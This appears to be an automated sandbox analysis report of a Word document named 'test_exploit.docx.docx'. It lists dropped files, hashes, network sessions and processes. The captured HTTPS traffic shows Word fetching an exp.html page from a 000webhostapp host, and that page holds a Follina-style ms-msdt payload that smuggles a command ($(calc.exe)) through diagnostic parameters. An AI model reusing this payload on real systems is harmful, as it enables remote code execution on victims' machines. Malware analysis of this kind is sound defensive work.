Preview:	L..................F.... ....O+..3...EI.p....._xp....5...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...T......................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..T.......S....................W.J.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..T.......Y..............>......Q&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..5...T.. .TEST_E~1.DOC..^......hT...T......h.....................2!..t.e.s.t._.e.x.p.l.o.i.t...d.o.c.x...d.o.c.x.......\...............-.......[...........>.S......C:\Users\user\Desktop\test_exploit.docx.docx..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.t.e.s.t._.e.x.p.l.o.i.t...d.o.c.x...d.o.c.x.........:..,.LB.)...As...`.......X.......813848...........!a..%.H.VZAj...h............-..!a..%.H.VZAj...h............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.156753368137562
Encrypted:	false
SSDEEP:	3:Rl/ZdS2Ll5lqKJaX/l/tl0KFQD5:RtZDQSSsD5
MD5:	72F7041B8F9DB57DA67A29674C56ED3F
SHA1:	4BC1D253E8BDC02754225186BA982EAE65D29C39
SHA-256:	01B9E8E8B9F68FB941B0634734C1B9D8A3D7DB9F3BA1649CD1F350C1F2DAFBD0
SHA-512:	38B04815D907FFC271E549E49EB6F0D5EADA9404C2164A26D5EED71ECFB8DDD7051EAB07F3F4E7433C6164704BBE9546F48FA8D85999DBA11E8053182B11D37B
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h..........I9............H.......6C.......M9.............................19............$...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$st_exploit.docx.docx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.156753368137562
Encrypted:	false
SSDEEP:	3:Rl/ZdS2Ll5lqKJaX/l/tl0KFQD5:RtZDQSSsD5
MD5:	72F7041B8F9DB57DA67A29674C56ED3F
SHA1:	4BC1D253E8BDC02754225186BA982EAE65D29C39
SHA-256:	01B9E8E8B9F68FB941B0634734C1B9D8A3D7DB9F3BA1649CD1F350C1F2DAFBD0
SHA-512:	38B04815D907FFC271E549E49EB6F0D5EADA9404C2164A26D5EED71ECFB8DDD7051EAB07F3F4E7433C6164704BBE9546F48FA8D85999DBA11E8053182B11D37B
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h..........I9............H.......6C.......M9.............................19............$...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.044599643065091
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	test_exploit.docx.docx
File size:	13714
MD5:	fcb4a6f299be7168bea772af871e203e
SHA1:	26428cb21220443643e53c619a98dac6d35acae6
SHA256:	e907ec4b1da6b2fa4e2fcff5b80d8c004f3b8922fcf62a76988a5a16036dcf8f
SHA512:	6ee9f865fbff6aa4655f8712fa7c555999763086a4e5f2620731902352e861ce5d8f1a6ecda7999df179fdf947f797546ea788cdb0b6528b0efb067be7b96be9
SSDEEP:	384:/+jY8hC78L88KAv3qYBN7LXQ/2j8YYB5LUY/:Si8L81AS41LXg2wbn
TLSH:	94528F27CB0AE470C65A11BD00EA03F6E20C8549C694FBAEAD15F1DD52D4ACB0B777C9
File Content Preview:	PK..........!....;}...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	74fcd0d2d6d6d0cc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2022 17:06:56.430705070 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.430752039 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.430847883 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.431323051 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.431348085 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.692811012 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.692949057 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.696742058 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.696772099 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.697084904 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.698704004 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.740503073 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.936696053 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.936783075 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:56.936863899 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.942251921 CEST	49732	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:56.942291021 CEST	443	49732	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.120153904 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.120196104 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.120282888 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.120795012 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.120815039 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.373919964 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.392692089 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.392724037 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.394803047 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.394826889 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.626494884 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.626568079 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.626665115 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.628173113 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.628201962 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:06:57.628216028 CEST	49733	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:06:57.628221989 CEST	443	49733	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:00.661195993 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:00.661258936 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:00.661371946 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:00.661607027 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:00.661619902 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:00.918147087 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:00.924802065 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:00.924823999 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:00.927093029 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:00.927105904 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:01.169507980 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:01.169630051 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:01.169724941 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:01.172749043 CEST	49739	443	192.168.2.3	145.14.144.97
Jun 18, 2022 17:07:01.172780991 CEST	443	49739	145.14.144.97	192.168.2.3
Jun 18, 2022 17:07:01.346249104 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.346302986 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.346400023 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.347167969 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.347193003 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.602787971 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.602910995 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.615056038 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.615077972 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.615374088 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.615437984 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.622071981 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.664490938 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.854757071 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.854845047 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.854856014 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:01.854913950 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.856082916 CEST	49740	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:01.856101990 CEST	443	49740	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.041841984 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.041907072 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.042018890 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.042350054 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.042375088 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.299354076 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.299495935 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.300091028 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.300112009 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.303708076 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.303752899 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.555017948 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.555088997 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.555157900 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.555210114 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.555259943 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.555279970 CEST	443	49741	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.555290937 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.555330038 CEST	49741	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.745383978 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.745431900 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:02.745537996 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.745964050 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:02.745980024 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:03.003521919 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:03.003659010 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:03.004154921 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:03.004168034 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:03.007833958 CEST	49742	443	192.168.2.3	145.14.144.176
Jun 18, 2022 17:07:03.007850885 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:03.260735035 CEST	443	49742	145.14.144.176	192.168.2.3
Jun 18, 2022 17:07:03.260823011 CEST	443	49742	145.14.144.176	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 18, 2022 17:06:56.361335993 CEST	56417	53	192.168.2.3	8.8.8.8
Jun 18, 2022 17:06:56.390758038 CEST	53	56417	8.8.8.8	192.168.2.3
Jun 18, 2022 17:07:01.302345037 CEST	57723	53	192.168.2.3	8.8.8.8
Jun 18, 2022 17:07:01.344537020 CEST	53	57723	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 18, 2022 17:06:56.361335993 CEST	192.168.2.3	8.8.8.8	0xee94	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)
Jun 18, 2022 17:07:01.302345037 CEST	192.168.2.3	8.8.8.8	0x27f0	Standard query (0)	samisoooo.000webhostapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 18, 2022 17:06:56.390758038 CEST	8.8.8.8	192.168.2.3	0xee94	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:06:56.390758038 CEST	8.8.8.8	192.168.2.3	0xee94	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.97	A (IP address)	IN (0x0001)
Jun 18, 2022 17:07:01.344537020 CEST	8.8.8.8	192.168.2.3	0x27f0	No error (0)	samisoooo.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)
Jun 18, 2022 17:07:01.344537020 CEST	8.8.8.8	192.168.2.3	0x27f0	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.144.176	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

samisoooo.000webhostapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49732	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:06:56 UTC	0	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49733	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:06:57 UTC	0	OUT	HEAD /exp.html HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com
2022-06-18 15:06:57 UTC	0	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:06:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 95485ca90d4a35c26a439f9a5091a66e

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49747	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:07 UTC	6	OUT	HEAD /exp.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:07 UTC	6	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 078464c77e1f75794d34cd0dca744163

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49748	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:08 UTC	7	OUT	HEAD /exp.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:08 UTC	7	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 4aa9b24188a4b0ba428264e9697b4435

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49749	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:10 UTC	7	OUT	HEAD /exp.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:11 UTC	7	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: b7c62b2c5cb7ff876844b7e3450534c6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49739	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:00 UTC	0	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49740	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:01 UTC	1	OUT	GET /exp.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:01 UTC	1	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: bbb8487f36071f15376c5595649e83be
2022-06-18 15:07:01 UTC	1	IN	Data Raw: 35 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 73 2d 6d 73 64 74 3a 2f 69 64 20 50 43 57 44 69 61 67 6e 6f 73 74 69 63 20 2f 73 6b 69 70 20 66 6f 72 63 65 20 2f 70 61 72 61 6d 20 5c 22 49 54 5f 52 65 62 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 63 61 6c 63 3f 63 20 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 4d 65 6e 75 20 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 68 24 28 63 61 6c 63 2e 65 78 65 29 29 27 29 29 29 29 69 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f Data Ascii: 532<!DOCTYPE html><html><head></head><body><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../
2022-06-18 15:07:01 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49741	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:02 UTC	2	OUT	HEAD /exp.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:02 UTC	3	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: c898f7601877e80b64cae969eea2664f

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49742	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:03 UTC	3	OUT	HEAD /exp.html HTTP/1.1 Authorization: Bearer X-MS-CookieUri-Requested: t X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:03 UTC	3	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 8f9d60ef7ab9e19642b5030eb7eb005e

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49743	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:03 UTC	3	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49744	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:04 UTC	4	OUT	HEAD /exp.html HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com
2022-06-18 15:07:04 UTC	4	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: dd050b1983456375f8a24427edbeb19c

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49745	145.14.144.97	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:05 UTC	4	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-MSGETWEBURL: t X-IDCRL_ACCEPTED: t Host: samisoooo.000webhostapp.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49746	145.14.144.176	443	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-06-18 15:07:05 UTC	4	OUT	GET /exp.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16) Accept-Encoding: gzip, deflate Host: samisoooo.000webhostapp.com Connection: Keep-Alive
2022-06-18 15:07:05 UTC	5	IN	HTTP/1.1 200 OK Date: Sat, 18 Jun 2022 15:07:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 202f2d54c3824f22585b44d7a4e23857
2022-06-18 15:07:05 UTC	5	IN	Data Raw: 35 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 73 2d 6d 73 64 74 3a 2f 69 64 20 50 43 57 44 69 61 67 6e 6f 73 74 69 63 20 2f 73 6b 69 70 20 66 6f 72 63 65 20 2f 70 61 72 61 6d 20 5c 22 49 54 5f 52 65 62 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 63 61 6c 63 3f 63 20 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 4d 65 6e 75 20 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 6c 65 3d 68 24 28 63 61 6c 63 2e 65 78 65 29 29 27 29 29 29 29 69 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f Data Ascii: 532<!DOCTYPE html><html><head></head><body><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=calc?c IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(calc.exe))'))))i/../../../../../../../../../
2022-06-18 15:07:05 UTC	6	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	17:06:49
Start date:	18/06/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x950000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: MSOSYNC.EXEPID: 6600, Parent PID: 6420

General

Target ID:	1
Start time:	17:06:56
Start date:	18/06/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:	0xfe0000
File size:	466688 bytes
MD5 hash:	EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:	true
Has administrator privileges:	true
